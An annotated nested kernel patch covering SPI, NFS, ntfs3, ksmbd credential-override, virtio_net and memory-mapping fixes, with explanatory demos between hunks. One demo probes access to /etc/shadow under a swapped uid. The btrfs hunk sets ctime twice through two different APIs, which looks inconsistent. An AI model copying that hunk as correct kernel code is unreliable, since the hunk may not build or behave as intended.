+-spi_geni_probe_runtime_disable:
+-	pm_runtime_disable(dev);
+ 	return ret;
+ }
+ 
+-static int spi_geni_remove(struct platform_device *pdev)
++static void spi_geni_remove(struct platform_device *pdev)
+ {
+ 	struct spi_master *spi = platform_get_drvdata(pdev);
+ 	struct spi_geni_master *mas = spi_master_get_devdata(spi);
+@@ -1011,11 +1011,9 @@ static int spi_geni_remove(struct platform_device *pdev)
+ 	/* Unregister _before_ disabling pm_runtime() so we stop transfers */
+ 	spi_unregister_master(spi);
+ 
+-	spi_geni_release_dma_chan(mas);
+-
+ 	free_irq(mas->irq, spi);
+-	pm_runtime_disable(&pdev->dev);
+-	return 0;
++
++	spi_geni_release_dma_chan(mas);
+ }
+ 
+ static int __maybe_unused spi_geni_runtime_suspend(struct device *dev)
+@@ -1097,7 +1095,7 @@ MODULE_DEVICE_TABLE(of, spi_geni_dt_match);
+ 
+ static struct platform_driver spi_geni_driver = {
+ 	.probe  = spi_geni_probe,
+-	.remove = spi_geni_remove,
++	.remove_new = spi_geni_remove,
+ 	.driver = {
+ 		.name = "geni_spi",
+ 		.pm = &spi_geni_pm_ops,
+diff --git a/drivers/spi/spi-nxp-fspi.c b/drivers/spi/spi-nxp-fspi.c
+index afecf69d3cebaa..c1a96daadbf642 100644
+--- a/drivers/spi/spi-nxp-fspi.c
++++ b/drivers/spi/spi-nxp-fspi.c
+@@ -754,14 +754,15 @@ static void nxp_fspi_fill_txfifo(struct nxp_fspi *f,
+ 	if (i < op->data.nbytes) {
+ 		u32 data = 0;
+ 		int j;
++		int remaining = op->data.nbytes - i;
+ 		/* Wait for TXFIFO empty */
+ 		ret = fspi_readl_poll_tout(f, f->iobase + FSPI_INTR,
+ 					   FSPI_INTR_IPTXWE, 0,
+ 					   POLL_TOUT, true);
+ 		WARN_ON(ret);
+ 
+-		for (j = 0; j < ALIGN(op->data.nbytes - i, 4); j += 4) {
+-			memcpy(&data, buf + i + j, 4);
++		for (j = 0; j < ALIGN(remaining, 4); j += 4) {
++			memcpy(&data, buf + i + j, min_t(int, 4, remaining - j));
+ 			fspi_writel(f, data, base + FSPI_TFDR + j);
+ 		}
+ 		fspi_writel(f, FSPI_INTR_IPTXWE, base + FSPI_INTR);
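
The FIFO is fed in whole 32-bit words, but the final word of an unaligned buffer must not be built by reading past op->data.nbytes; capping each memcpy at the bytes that actually remain fixes the overread, with the pre-cleared word providing the padding. The same tail handling in plain C:

#include <stdio.h>
#include <string.h>

#define MIN(a, b) ((a) < (b) ? (a) : (b))

int main(void)
{
	const unsigned char buf[6] = { 1, 2, 3, 4, 5, 6 };	/* not word aligned */
	int remaining = sizeof(buf);
	int j;

	for (j = 0; j < remaining; j += 4) {
		unsigned int word = 0;	/* zero padding for the partial tail */

		/* copy at most 4 bytes, never reading past the buffer */
		memcpy(&word, buf + j, MIN(4, remaining - j));
		printf("word %d: 0x%08x\n", j / 4, word);
	}
	return 0;
}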
+diff --git a/drivers/staging/media/atomisp/pci/sh_css_frac.h b/drivers/staging/media/atomisp/pci/sh_css_frac.h
+index 8f08df5c88cc36..569a2f59e5519f 100644
+--- a/drivers/staging/media/atomisp/pci/sh_css_frac.h
++++ b/drivers/staging/media/atomisp/pci/sh_css_frac.h
+@@ -30,12 +30,24 @@
+ #define uISP_VAL_MAX		      ((unsigned int)((1 << uISP_REG_BIT) - 1))
+ 
+ /* a:fraction bits for 16bit precision, b:fraction bits for ISP precision */
+-#define sDIGIT_FITTING(v, a, b) \
+-	min_t(int, max_t(int, (((v) >> sSHIFT) >> max(sFRACTION_BITS_FITTING(a) - (b), 0)), \
+-	  sISP_VAL_MIN), sISP_VAL_MAX)
+-#define uDIGIT_FITTING(v, a, b) \
+-	min((unsigned int)max((unsigned)(((v) >> uSHIFT) \
+-	>> max((int)(uFRACTION_BITS_FITTING(a) - (b)), 0)), \
+-	  uISP_VAL_MIN), uISP_VAL_MAX)
++static inline int sDIGIT_FITTING(int v, int a, int b)
++{
++	int fit_shift = sFRACTION_BITS_FITTING(a) - b;
++
++	v >>= sSHIFT;
++	v >>= fit_shift > 0 ? fit_shift : 0;
++
++	return clamp_t(int, v, sISP_VAL_MIN, sISP_VAL_MAX);
++}
++
++static inline unsigned int uDIGIT_FITTING(unsigned int v, int a, int b)
++{
++	int fit_shift = uFRACTION_BITS_FITTING(a) - b;
++
++	v >>= uSHIFT;
++	v >>= fit_shift > 0 ? fit_shift : 0;
++
++	return clamp_t(unsigned int, v, uISP_VAL_MIN, uISP_VAL_MAX);
++}
+ 
+ #endif /* __SH_CSS_FRAC_H */
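
Converting the fitting macros to static inline functions keeps the arithmetic identical but evaluates the argument exactly once and gives it a real type; the old nested min/max macros could evaluate v several times. A self-contained demonstration of the double-evaluation hazard the conversion removes (macro and values invented for illustration):

#include <stdio.h>

#define MAX_MACRO(a, b) ((a) > (b) ? (a) : (b))

static inline int max_inline(int a, int b)
{
	return a > b ? a : b;
}

int main(void)
{
	int i = 1, j = 1;

	int m = MAX_MACRO(i++, 0);	/* i++ expands twice: i becomes 3 */
	int n = max_inline(j++, 0);	/* j++ evaluated once: j becomes 2 */

	printf("macro : m=%d i=%d\n", m, i);	/* m=2, i=3 */
	printf("inline: n=%d j=%d\n", n, j);	/* n=1, j=2 */
	return 0;
}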
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index e5017b2ade573c..894887640c4360 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -4379,6 +4379,7 @@ static int __btrfs_unlink_inode(struct btrfs_trans_handle *trans,
+ 
+ 	btrfs_i_size_write(dir, dir->vfs_inode.i_size - name->len * 2);
+ 	inode_inc_iversion(&inode->vfs_inode);
++	inode_set_ctime_current(&inode->vfs_inode);
+ 	inode_inc_iversion(&dir->vfs_inode);
+ 	inode->vfs_inode.i_ctime = current_time(&inode->vfs_inode);
+ 	dir->vfs_inode.i_mtime = inode->vfs_inode.i_ctime;
+diff --git a/fs/nfs/delegation.c b/fs/nfs/delegation.c
+index ead8a0e06abf9a..2ba4d221bf9d5b 100644
+--- a/fs/nfs/delegation.c
++++ b/fs/nfs/delegation.c
+@@ -627,6 +627,9 @@ static int nfs_server_return_marked_delegations(struct nfs_server *server,
+ 				prev = delegation;
+ 			continue;
+ 		}
++		inode = nfs_delegation_grab_inode(delegation);
++		if (inode == NULL)
++			continue;
+ 
+ 		if (prev) {
+ 			struct inode *tmp = nfs_delegation_grab_inode(prev);
+@@ -637,12 +640,6 @@ static int nfs_server_return_marked_delegations(struct nfs_server *server,
+ 			}
+ 		}
+ 
+-		inode = nfs_delegation_grab_inode(delegation);
+-		if (inode == NULL) {
+-			rcu_read_unlock();
+-			iput(to_put);
+-			goto restart;
+-		}
+ 		delegation = nfs_start_delegation_return_locked(NFS_I(inode));
+ 		rcu_read_unlock();
+ 
+@@ -1164,7 +1161,6 @@ static int nfs_server_reap_unclaimed_delegations(struct nfs_server *server,
+ 	struct inode *inode;
+ restart:
+ 	rcu_read_lock();
+-restart_locked:
+ 	list_for_each_entry_rcu(delegation, &server->delegations, super_list) {
+ 		if (test_bit(NFS_DELEGATION_INODE_FREEING,
+ 					&delegation->flags) ||
+@@ -1175,7 +1171,7 @@ static int nfs_server_reap_unclaimed_delegations(struct nfs_server *server,
+ 			continue;
+ 		inode = nfs_delegation_grab_inode(delegation);
+ 		if (inode == NULL)
+-			goto restart_locked;
++			continue;
+ 		delegation = nfs_start_delegation_return_locked(NFS_I(inode));
+ 		rcu_read_unlock();
+ 		if (delegation != NULL) {
+@@ -1296,7 +1292,6 @@ static int nfs_server_reap_expired_delegations(struct nfs_server *server,
+ 	nfs4_stateid stateid;
+ restart:
+ 	rcu_read_lock();
+-restart_locked:
+ 	list_for_each_entry_rcu(delegation, &server->delegations, super_list) {
+ 		if (test_bit(NFS_DELEGATION_INODE_FREEING,
+ 					&delegation->flags) ||
+@@ -1307,7 +1302,7 @@ static int nfs_server_reap_expired_delegations(struct nfs_server *server,
+ 			continue;
+ 		inode = nfs_delegation_grab_inode(delegation);
+ 		if (inode == NULL)
+-			goto restart_locked;
++			continue;
+ 		spin_lock(&delegation->lock);
+ 		cred = get_cred_rcu(delegation->cred);
+ 		nfs4_stateid_copy(&stateid, &delegation->stateid);
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 467e9439ededba..1e97de7c8c204b 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -9850,13 +9850,16 @@ static void nfs4_layoutreturn_done(struct rpc_task *task, void *calldata)
+ 		fallthrough;
+ 	default:
+ 		task->tk_status = 0;
++		lrp->res.lrs_present = 0;
+ 		fallthrough;
+ 	case 0:
+ 		break;
+ 	case -NFS4ERR_DELAY:
+-		if (nfs4_async_handle_error(task, server, NULL, NULL) != -EAGAIN)
+-			break;
+-		goto out_restart;
++		if (nfs4_async_handle_error(task, server, NULL, NULL) ==
++		    -EAGAIN)
++			goto out_restart;
++		lrp->res.lrs_present = 0;
++		break;
+ 	}
+ 	return;
+ out_restart:
+diff --git a/fs/nfs/pnfs.c b/fs/nfs/pnfs.c
+index 8c1f47ca5dc536..c96d2e76156e8b 100644
+--- a/fs/nfs/pnfs.c
++++ b/fs/nfs/pnfs.c
+@@ -1172,10 +1172,9 @@ void pnfs_layoutreturn_free_lsegs(struct pnfs_layout_hdr *lo,
+ 	LIST_HEAD(freeme);
+ 
+ 	spin_lock(&inode->i_lock);
+-	if (!pnfs_layout_is_valid(lo) ||
+-	    !nfs4_stateid_match_other(&lo->plh_stateid, arg_stateid))
++	if (!nfs4_stateid_match_other(&lo->plh_stateid, arg_stateid))
+ 		goto out_unlock;
+-	if (stateid) {
++	if (stateid && pnfs_layout_is_valid(lo)) {
+ 		u32 seq = be32_to_cpu(arg_stateid->seqid);
+ 
+ 		pnfs_mark_matching_lsegs_invalid(lo, &freeme, range, seq);
+diff --git a/fs/ntfs3/attrlist.c b/fs/ntfs3/attrlist.c
+index 723e49ec83ce77..82bd9b5d9bd801 100644
+--- a/fs/ntfs3/attrlist.c
++++ b/fs/ntfs3/attrlist.c
+@@ -29,7 +29,7 @@ static inline bool al_is_valid_le(const struct ntfs_inode *ni,
+ void al_destroy(struct ntfs_inode *ni)
+ {
+ 	run_close(&ni->attr_list.run);
+-	kfree(ni->attr_list.le);
++	kvfree(ni->attr_list.le);
+ 	ni->attr_list.le = NULL;
+ 	ni->attr_list.size = 0;
+ 	ni->attr_list.dirty = false;
+@@ -318,7 +318,7 @@ int al_add_le(struct ntfs_inode *ni, enum ATTR_TYPE type, const __le16 *name,
+ 		memcpy(ptr, al->le, off);
+ 		memcpy(Add2Ptr(ptr, off + sz), le, old_size - off);
+ 		le = Add2Ptr(ptr, off);
+-		kfree(al->le);
++		kvfree(al->le);
+ 		al->le = ptr;
+ 	} else {
+ 		memmove(Add2Ptr(le, sz), le, old_size - off);
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index 70d9d08fc61bc1..8dbd8e70c2956e 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -124,7 +124,7 @@ void wnd_close(struct wnd_bitmap *wnd)
+ {
+ 	struct rb_node *node, *next;
+ 
+-	kfree(wnd->free_bits);
++	kvfree(wnd->free_bits);
+ 	run_close(&wnd->run);
+ 
+ 	node = rb_first(&wnd->start_tree);
+@@ -1333,7 +1333,7 @@ int wnd_extend(struct wnd_bitmap *wnd, size_t new_bits)
+ 		memcpy(new_free, wnd->free_bits, wnd->nwnd * sizeof(short));
+ 		memset(new_free + wnd->nwnd, 0,
+ 		       (new_wnd - wnd->nwnd) * sizeof(short));
+-		kfree(wnd->free_bits);
++		kvfree(wnd->free_bits);
+ 		wnd->free_bits = new_free;
+ 	}
+ 
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index 7bfdc91fae1ed1..b3299cda596227 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -773,7 +773,7 @@ static int ni_try_remove_attr_list(struct ntfs_inode *ni)
+ 	run_deallocate(sbi, &ni->attr_list.run, true);
+ 	run_close(&ni->attr_list.run);
+ 	ni->attr_list.size = 0;
+-	kfree(ni->attr_list.le);
++	kvfree(ni->attr_list.le);
+ 	ni->attr_list.le = NULL;
+ 	ni->attr_list.dirty = false;
+ 
+@@ -924,7 +924,7 @@ int ni_create_attr_list(struct ntfs_inode *ni)
+ 	goto out;
+ 
+ out1:
+-	kfree(ni->attr_list.le);
++	kvfree(ni->attr_list.le);
+ 	ni->attr_list.le = NULL;
+ 	ni->attr_list.size = 0;
+ 	return err;
+diff --git a/fs/ntfs3/super.c b/fs/ntfs3/super.c
+index 667ff92f5afc5b..eee54214f4a3db 100644
+--- a/fs/ntfs3/super.c
++++ b/fs/ntfs3/super.c
+@@ -441,7 +441,7 @@ static noinline void put_ntfs(struct ntfs_sb_info *sbi)
+ {
+ 	kfree(sbi->new_rec);
+ 	kvfree(ntfs_put_shared(sbi->upcase));
+-	kfree(sbi->def_table);
++	kvfree(sbi->def_table);
+ 
+ 	wnd_close(&sbi->mft.bitmap);
+ 	wnd_close(&sbi->used.bitmap);
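
Every ntfs3 hunk here applies one rule: memory that may have come from kvmalloc(), which falls back from kmalloc to vmalloc for large sizes, must be released with kvfree(), which picks the matching free path; plain kfree() on vmalloc memory corrupts the allocators. A userspace caricature of why the paired free must dispatch (both paths are malloc() here, unlike the kernel):

#include <stdio.h>
#include <stdlib.h>

/* mimic kvmalloc(): small requests from one allocator, large from another */
static void *kv_alloc(size_t n, int *large)
{
	*large = n > 4096;
	return malloc(n);	/* both paths are malloc() here; the kernel's differ */
}

/* mimic kvfree(): the only free that is correct for either path */
static void kv_free(void *p, int large)
{
	printf("freeing via %s path\n", large ? "vfree" : "kfree");
	free(p);
}

int main(void)
{
	int large;
	void *p = kv_alloc(64 * 1024, &large);

	kv_free(p, large);	/* a bare kfree(p) would be wrong for vmalloc memory */
	return 0;
}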
+diff --git a/fs/smb/server/mgmt/share_config.c b/fs/smb/server/mgmt/share_config.c
+index e0a6b758094fc5..d8d03070ae44b4 100644
+--- a/fs/smb/server/mgmt/share_config.c
++++ b/fs/smb/server/mgmt/share_config.c
+@@ -15,6 +15,7 @@
+ #include "share_config.h"
+ #include "user_config.h"
+ #include "user_session.h"
++#include "../connection.h"
+ #include "../transport_ipc.h"
+ #include "../misc.h"
+ 
+@@ -120,12 +121,13 @@ static int parse_veto_list(struct ksmbd_share_config *share,
+ 	return 0;
+ }
+ 
+-static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
++static struct ksmbd_share_config *share_config_request(struct ksmbd_work *work,
+ 						       const char *name)
+ {
+ 	struct ksmbd_share_config_response *resp;
+ 	struct ksmbd_share_config *share = NULL;
+ 	struct ksmbd_share_config *lookup;
++	struct unicode_map *um = work->conn->um;
+ 	int ret;
+ 
+ 	resp = ksmbd_ipc_share_config_request(name);
+@@ -181,7 +183,14 @@ static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
+ 				      KSMBD_SHARE_CONFIG_VETO_LIST(resp),
+ 				      resp->veto_list_sz);
+ 		if (!ret && share->path) {
++			if (__ksmbd_override_fsids(work, share)) {
++				kill_share(share);
++				share = NULL;
++				goto out;
++			}
++
+ 			ret = kern_path(share->path, 0, &share->vfs_path);
++			ksmbd_revert_fsids(work);
+ 			if (ret) {
+ 				ksmbd_debug(SMB, "failed to access '%s'\n",
+ 					    share->path);
+@@ -214,7 +223,7 @@ static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
+ 	return share;
+ }
+ 
+-struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
++struct ksmbd_share_config *ksmbd_share_config_get(struct ksmbd_work *work,
+ 						  const char *name)
+ {
+ 	struct ksmbd_share_config *share;
+@@ -227,7 +236,7 @@ struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
+ 
+ 	if (share)
+ 		return share;
+-	return share_config_request(um, name);
++	return share_config_request(work, name);
+ }
+ 
+ bool ksmbd_share_veto_filename(struct ksmbd_share_config *share,
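
The share_config.c change above brackets the kern_path() lookup with __ksmbd_override_fsids() and ksmbd_revert_fsids(), so the share's path is resolved with the share's credentials rather than the daemon's. A loose userspace analogy, assuming a privileged process and using entirely hypothetical names, is the seteuid() bracket below:

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/* Hypothetical check that temporarily assumes another identity before
 * touching the path, then restores the caller's identity on the way
 * out; the same acquire/act/revert shape as the hunk above. */
static int check_path_as(uid_t uid, const char *path)
{
        uid_t saved = geteuid();
        int rc;

        if (seteuid(uid) < 0)
                return -1;              /* could not assume the identity */
        rc = access(path, R_OK);        /* the actual lookup */
        seteuid(saved);                 /* revert unconditionally */
        return rc;
}

int main(int argc, char **argv)
{
        const char *p = argc > 1 ? argv[1] : "/etc/shadow";

        /* Must start privileged for seteuid() to succeed. */
        printf("as uid 65534: %s -> %d\n", p, check_path_as(65534, p));
        return 0;
}
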
+diff --git a/fs/smb/server/mgmt/share_config.h b/fs/smb/server/mgmt/share_config.h
+index 5f591751b92365..d4ac2dd4de2040 100644
+--- a/fs/smb/server/mgmt/share_config.h
++++ b/fs/smb/server/mgmt/share_config.h
+@@ -11,6 +11,8 @@
+ #include <linux/path.h>
+ #include <linux/unicode.h>
+ 
++struct ksmbd_work;
++
+ struct ksmbd_share_config {
+ 	char			*name;
+ 	char			*path;
+@@ -68,7 +70,7 @@ static inline void ksmbd_share_config_put(struct ksmbd_share_config *share)
+ 	__ksmbd_share_config_put(share);
+ }
+ 
+-struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
++struct ksmbd_share_config *ksmbd_share_config_get(struct ksmbd_work *work,
+ 						  const char *name);
+ bool ksmbd_share_veto_filename(struct ksmbd_share_config *share,
+ 			       const char *filename);
+diff --git a/fs/smb/server/mgmt/tree_connect.c b/fs/smb/server/mgmt/tree_connect.c
+index d2c81a8a11dda1..94a52a75014a43 100644
+--- a/fs/smb/server/mgmt/tree_connect.c
++++ b/fs/smb/server/mgmt/tree_connect.c
+@@ -16,17 +16,18 @@
+ #include "user_session.h"
+ 
+ struct ksmbd_tree_conn_status
+-ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-			const char *share_name)
++ksmbd_tree_conn_connect(struct ksmbd_work *work, const char *share_name)
+ {
+ 	struct ksmbd_tree_conn_status status = {-ENOENT, NULL};
+ 	struct ksmbd_tree_connect_response *resp = NULL;
+ 	struct ksmbd_share_config *sc;
+ 	struct ksmbd_tree_connect *tree_conn = NULL;
+ 	struct sockaddr *peer_addr;
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
+ 	int ret;
+ 
+-	sc = ksmbd_share_config_get(conn->um, share_name);
++	sc = ksmbd_share_config_get(work, share_name);
+ 	if (!sc)
+ 		return status;
+ 
+@@ -61,7 +62,7 @@ ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 		struct ksmbd_share_config *new_sc;
+ 
+ 		ksmbd_share_config_del(sc);
+-		new_sc = ksmbd_share_config_get(conn->um, share_name);
++		new_sc = ksmbd_share_config_get(work, share_name);
+ 		if (!new_sc) {
+ 			pr_err("Failed to update stale share config\n");
+ 			status.ret = -ESTALE;
+diff --git a/fs/smb/server/mgmt/tree_connect.h b/fs/smb/server/mgmt/tree_connect.h
+index 6377a70b811c89..a42cdd05104114 100644
+--- a/fs/smb/server/mgmt/tree_connect.h
++++ b/fs/smb/server/mgmt/tree_connect.h
+@@ -13,6 +13,7 @@
+ struct ksmbd_share_config;
+ struct ksmbd_user;
+ struct ksmbd_conn;
++struct ksmbd_work;
+ 
+ enum {
+ 	TREE_NEW = 0,
+@@ -50,8 +51,7 @@ static inline int test_tree_conn_flag(struct ksmbd_tree_connect *tree_conn,
+ struct ksmbd_session;
+ 
+ struct ksmbd_tree_conn_status
+-ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-			const char *share_name);
++ksmbd_tree_conn_connect(struct ksmbd_work *work, const char *share_name);
+ void ksmbd_tree_connect_put(struct ksmbd_tree_connect *tcon);
+ 
+ int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 898622b52b48e8..dc8f1e7ce2fa96 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -1975,7 +1975,7 @@ int smb2_tree_connect(struct ksmbd_work *work)
+ 	ksmbd_debug(SMB, "tree connect request for tree %s treename %s\n",
+ 		    name, treename);
+ 
+-	status = ksmbd_tree_conn_connect(conn, sess, name);
++	status = ksmbd_tree_conn_connect(work, name);
+ 	if (status.ret == KSMBD_TREE_CONN_STATUS_OK)
+ 		rsp->hdr.Id.SyncId.TreeId = cpu_to_le32(status.tree_conn->id);
+ 	else
+@@ -3482,7 +3482,7 @@ int smb2_open(struct ksmbd_work *work)
+ 	kfree(name);
+ 	kfree(lc);
+ 
+-	return 0;
++	return rc;
+ }
+ 
+ static int readdir_info_level_struct_sz(int info_level)
+@@ -5326,6 +5326,11 @@ int smb2_query_info(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "GOT query info request\n");
+ 
++	if (ksmbd_override_fsids(work)) {
++		rc = -ENOMEM;
++		goto err_out;
++	}
++
+ 	switch (req->InfoType) {
+ 	case SMB2_O_INFO_FILE:
+ 		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILE\n");
+@@ -5344,6 +5349,7 @@ int smb2_query_info(struct ksmbd_work *work)
+ 			    req->InfoType);
+ 		rc = -EOPNOTSUPP;
+ 	}
++	ksmbd_revert_fsids(work);
+ 
+ 	if (!rc) {
+ 		rsp->StructureSize = cpu_to_le16(9);
+@@ -5353,6 +5359,7 @@ int smb2_query_info(struct ksmbd_work *work)
+ 					le32_to_cpu(rsp->OutputBufferLength));
+ 	}
+ 
++err_out:
+ 	if (rc < 0) {
+ 		if (rc == -EACCES)
+ 			rsp->hdr.Status = STATUS_ACCESS_DENIED;
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+index e90a1e8c1951db..bdcdc0fc9cad5e 100644
+--- a/fs/smb/server/smb_common.c
++++ b/fs/smb/server/smb_common.c
+@@ -729,10 +729,10 @@ bool is_asterisk(char *p)
+ 	return p && p[0] == '*';
+ }
+ 
+-int ksmbd_override_fsids(struct ksmbd_work *work)
++int __ksmbd_override_fsids(struct ksmbd_work *work,
++		struct ksmbd_share_config *share)
+ {
+ 	struct ksmbd_session *sess = work->sess;
+-	struct ksmbd_share_config *share = work->tcon->share_conf;
+ 	struct cred *cred;
+ 	struct group_info *gi;
+ 	unsigned int uid;
+@@ -772,6 +772,11 @@ int ksmbd_override_fsids(struct ksmbd_work *work)
+ 	return 0;
+ }
+ 
++int ksmbd_override_fsids(struct ksmbd_work *work)
++{
++	return __ksmbd_override_fsids(work, work->tcon->share_conf);
++}
++
+ void ksmbd_revert_fsids(struct ksmbd_work *work)
+ {
+ 	const struct cred *cred;
+diff --git a/fs/smb/server/smb_common.h b/fs/smb/server/smb_common.h
+index f1092519c0c288..4a3148b0167f54 100644
+--- a/fs/smb/server/smb_common.h
++++ b/fs/smb/server/smb_common.h
+@@ -447,6 +447,8 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn,
+ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command);
+ 
+ int ksmbd_smb_check_shared_mode(struct file *filp, struct ksmbd_file *curr_fp);
++int __ksmbd_override_fsids(struct ksmbd_work *work,
++			   struct ksmbd_share_config *share);
+ int ksmbd_override_fsids(struct ksmbd_work *work);
+ void ksmbd_revert_fsids(struct ksmbd_work *work);
+ 
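
The smb_common.c hunk is a classic extract-and-wrap refactor: the body moves into a helper that takes the share config explicitly, and the old entry point becomes a one-line wrapper, leaving existing callers untouched while new callers (share_config_request() above) can supply a config that is not yet attached to a tree connection. A minimal sketch of the same shape, with invented names:

#include <stdio.h>

struct cfg { int level; };
struct ctx { struct cfg *active; };

/* The generalized helper takes the configuration explicitly... */
static int apply_with(struct ctx *c, struct cfg *cfg)
{
        printf("ctx %p: applying level %d\n", (void *)c, cfg->level);
        return 0;
}

/* ...and the original entry point becomes a thin wrapper that feeds
 * in the context's own config, so existing call sites are unchanged. */
static int apply(struct ctx *c)
{
        return apply_with(c, c->active);
}

int main(void)
{
        struct cfg def = { .level = 1 };
        struct cfg pending = { .level = 2 };
        struct ctx c = { .active = &def };

        apply(&c);                  /* old call sites: unchanged */
        apply_with(&c, &pending);   /* new call site: config not attached yet */
        return 0;
}
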
+diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h
+index b2aee17a34d775..271c5a87751fe3 100644
+--- a/include/linux/mlx5/mlx5_ifc.h
++++ b/include/linux/mlx5/mlx5_ifc.h
+@@ -973,7 +973,8 @@ struct mlx5_ifc_qos_cap_bits {
+ 
+ 	u8         max_tsar_bw_share[0x20];
+ 
+-	u8         reserved_at_100[0x20];
++	u8         nic_element_type[0x10];
++	u8         nic_tsar_type[0x10];
+ 
+ 	u8         reserved_at_120[0x3];
+ 	u8         log_meter_aso_granularity[0x5];
+@@ -3742,10 +3743,11 @@ enum {
+ };
+ 
+ enum {
+-	ELEMENT_TYPE_CAP_MASK_TASR		= 1 << 0,
++	ELEMENT_TYPE_CAP_MASK_TSAR		= 1 << 0,
+ 	ELEMENT_TYPE_CAP_MASK_VPORT		= 1 << 1,
+ 	ELEMENT_TYPE_CAP_MASK_VPORT_TC		= 1 << 2,
+ 	ELEMENT_TYPE_CAP_MASK_PARA_VPORT_TC	= 1 << 3,
++	ELEMENT_TYPE_CAP_MASK_QUEUE_GROUP	= 1 << 4,
+ };
+ 
+ struct mlx5_ifc_scheduling_context_bits {
+@@ -4444,6 +4446,12 @@ enum {
+ 	TSAR_ELEMENT_TSAR_TYPE_ETS = 0x2,
+ };
+ 
++enum {
++	TSAR_TYPE_CAP_MASK_DWRR		= 1 << 0,
++	TSAR_TYPE_CAP_MASK_ROUND_ROBIN	= 1 << 1,
++	TSAR_TYPE_CAP_MASK_ETS		= 1 << 2,
++};
++
+ struct mlx5_ifc_tsar_element_bits {
+ 	u8         reserved_at_0[0x8];
+ 	u8         tsar_type[0x8];
+diff --git a/include/linux/virtio_net.h b/include/linux/virtio_net.h
+index 823e28042f4107..62613d4d84b718 100644
+--- a/include/linux/virtio_net.h
++++ b/include/linux/virtio_net.h
+@@ -161,7 +161,8 @@ static inline int virtio_net_hdr_to_skb(struct sk_buff *skb,
+ 			break;
+ 		case SKB_GSO_TCPV4:
+ 		case SKB_GSO_TCPV6:
+-			if (skb->csum_offset != offsetof(struct tcphdr, check))
++			if (skb->ip_summed == CHECKSUM_PARTIAL &&
++			    skb->csum_offset != offsetof(struct tcphdr, check))
+ 				return -EINVAL;
+ 			break;
+ 		}
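
The virtio_net hunk narrows the csum_offset sanity check to packets that actually carry a partial checksum; for anything else the field is not meaningful and must not cause a spurious -EINVAL. A small sketch of the fixed predicate, relying on glibc's netinet/tcp.h for struct tcphdr (the CHECKSUM_* constants are stand-ins for the skb states):

#include <stdio.h>
#include <stddef.h>
#include <netinet/tcp.h>

enum { CHECKSUM_NONE, CHECKSUM_PARTIAL };   /* stand-ins for skb->ip_summed */

/* The checksum offset is only validated when the packet carries a
 * partial checksum, mirroring the condition added in the hunk above. */
static int tcp_gso_hdr_ok(int ip_summed, size_t csum_offset)
{
        if (ip_summed == CHECKSUM_PARTIAL &&
            csum_offset != offsetof(struct tcphdr, check))
                return 0;       /* -EINVAL in the kernel */
        return 1;
}

int main(void)
{
        printf("offsetof(struct tcphdr, check) = %zu\n",
               offsetof(struct tcphdr, check));
        printf("partial, bad offset : %d\n", tcp_gso_hdr_ok(CHECKSUM_PARTIAL, 4));
        printf("no csum, any offset : %d\n", tcp_gso_hdr_ok(CHECKSUM_NONE, 4));
        return 0;
}
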
+diff --git a/mm/memory.c b/mm/memory.c
+index 73085e36aabac5..da9fed5e602530 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -2480,11 +2480,7 @@ static inline int remap_p4d_range(struct mm_struct *mm, pgd_t *pgd,
+ 	return 0;
+ }
+ 
+-/*
+- * Variant of remap_pfn_range that does not call track_pfn_remap.  The caller
+- * must have pre-validated the caching bits of the pgprot_t.
+- */
+-int remap_pfn_range_notrack(struct vm_area_struct *vma, unsigned long addr,
++static int remap_pfn_range_internal(struct vm_area_struct *vma, unsigned long addr,
+ 		unsigned long pfn, unsigned long size, pgprot_t prot)
+ {
+ 	pgd_t *pgd;
+@@ -2537,6 +2533,27 @@ int remap_pfn_range_notrack(struct vm_area_struct *vma, unsigned long addr,
+ 	return 0;
+ }
+ 
++/*
++ * Variant of remap_pfn_range that does not call track_pfn_remap.  The caller
++ * must have pre-validated the caching bits of the pgprot_t.
++ */
++int remap_pfn_range_notrack(struct vm_area_struct *vma, unsigned long addr,
++		unsigned long pfn, unsigned long size, pgprot_t prot)
++{
++	int error = remap_pfn_range_internal(vma, addr, pfn, size, prot);
++
++	if (!error)
++		return 0;
++
++	/*
++	 * A partial pfn range mapping is dangerous: it does not
++	 * maintain page reference counts, and callers may free
++	 * pages due to the error. So zap it early.
++	 */
++	zap_page_range_single(vma, addr, size, NULL);
++	return error;
++}
++
+ /**
+  * remap_pfn_range - remap kernel memory to userspace
+  * @vma: user vma to map to
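
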